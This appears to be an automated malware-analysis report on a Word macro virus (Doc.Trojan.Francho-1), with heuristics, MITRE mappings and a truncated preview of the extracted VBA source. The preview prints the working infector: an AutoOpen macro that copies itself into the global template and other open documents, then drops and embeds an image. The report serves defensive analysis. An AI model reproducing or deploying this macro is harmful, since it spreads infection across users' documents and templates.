MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Word document containing a VBA macro with an AutoOpen subroutine, indicative of malicious intent. The macro attempts to copy itself to other documents and templates, suggesting an infection mechanism. It also attempts to create a file named 'francho.jpg' and embed it, which may be a decoy or part of a payload delivery chain.
Heuristics 6
-
ClamAV: Doc.Trojan.Francho-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Francho-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 92072 bytes |
SHA-256: 07f8ba60724b73f6e72267389f2d28c970bdd414c7beab9156316903bde9fa9e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
' Infector Engine
' (c) 1999 by ?
On Error GoTo error
anfitrion = Application.MacroContainer
portador = Application.Documents(1).path + "\" + Application.Documents(1)
globaldot = Application.Templates(1).path + "\" + Application.Templates(1)
If anfitrion = Application.Templates(1) Then GoTo SeEjecutoElGlobal
Application.OrganizerDelete Source:=globaldot, Name:="NewMacros", Object:=wdOrganizerObjectProjectItems
error:
If portador = "" Then GoTo fin
Application.OrganizerCopy Source:=portador, Destination:=globaldot, Name:="NewMacros", Object:=wdOrganizerObjectProjectItems
GoTo fin
SeEjecutoElGlobal:
On Error GoTo fin
For T = 1 To 10
anfitrion = Application.Documents(T).path + "\" + Application.Documents(T)
Application.OrganizerCopy Source:=globaldot, Destination:=anfitrion, Name:="NewMacros", Object:=wdOrganizerObjectProjectItems
Next T
fin:
cs = Second(Now())
If (cs > 50) Then
globaldotf = Application.Templates(1).path + "\francho.jpg"
GenBin0 (globaldotf)
ActiveDocument.Shapes.AddPicture Anchor:=Selection.Range, FileName:= _
globaldotf, LinkToFile:=False, _
SaveWithDocument:=True
Selection.TypeText Text:="Hasta donde crees que puedes llegar hoy ?"
End If
End Sub
Sub GenBin0(spath As String)
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile(spath, True)
Line = Chr$(255) + Chr$(216) + Chr$(255) + Chr$(224) + Chr$(0) + Chr$(16) + Chr$(74) + Chr$(70) + Chr$(73) + Chr$(70) + Chr$(0) + Chr$(1) + Chr$(1) + Chr$(0) + Chr$(0) + Chr$(1) + Chr$(0) + Chr$(1) + Chr$(0) + Chr$(0) + Chr$(255) + Chr$(219) + Chr$(0) + Chr$(67) + Chr$(0) + Chr$(28) + Chr$(19) + Chr$(21) + Chr$(24) + Chr$(21)
a.Write (Line)
Line = Chr$(17) + Chr$(28) + Chr$(24) + Chr$(22) + Chr$(24) + Chr$(31) + Chr$(29) + Chr$(28) + Chr$(33) + Chr$(41) + Chr$(69) + Chr$(45) + Chr$(41) + Chr$(38) + Chr$(38) + Chr$(41) + Chr$(84) + Chr$(60) + Chr$(64) + Chr$(50) + Chr$(69) + Chr$(100) + Chr$(88) + Chr$(105) + Chr$(103) + Chr$(98) + Chr$(88) + Chr$(96) + Chr$(95) + Chr$(110)
a.Write (Line)
Line = Chr$(124) + Chr$(158) + Chr$(134) + Chr$(110) + Chr$(117) + Chr$(150) + Chr$(119) + Chr$(95) + Chr$(96) + Chr$(138) + Chr$(187) + Chr$(139) + Chr$(150) + Chr$(163) + Chr$(169) + Chr$(177) + Chr$(179) + Chr$(177) + Chr$(107) + Chr$(132) + Chr$(194) + Chr$(208) + Chr$(193) + Chr$(172) + Chr$(206) + Chr$(158) + Chr$(174) + Chr$(177) + Chr$(170) + Chr$(255)
a.Write (Line)
Line = Chr$(219) + Chr$(0) + Chr$(67) + Chr$(1) + Chr$(29) + Chr$(31) + Chr$(31) + Chr$(41) + Chr$(36) + Chr$(41) + Chr$(81) + Chr$(45) + Chr$(45) + Chr$(81) + Chr$(170) + Chr$(114) + Chr$(96) + Chr$(114) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170)
a.Write (Line)
Line = Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170)
a.Write (Line)
Line = Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(170) + Chr$(255) + Chr$(192) + Chr$(0) + Chr$(17) + Chr$(8) + Chr$(0) + Chr$(81) + Chr$(0) + Chr$(68) + Chr$(3) + Chr$(1) + Chr$(34) + Chr$(0) + Chr$(2) + Chr$(17) + Chr$(1) + Chr$(3) + Chr$(17) + Chr$(1) + Chr$(255) + Chr$(196) + Chr$(0)
a.Write (Line)
Line = Chr$(31) + Chr$(0) + Chr$(0) + Chr$(1) + Chr$(5) + Chr$(1) + Chr$(1) + Chr$(1) + Chr$(1) + Chr$(1) + Chr$(1) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(0) + Chr$(1) + Chr
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.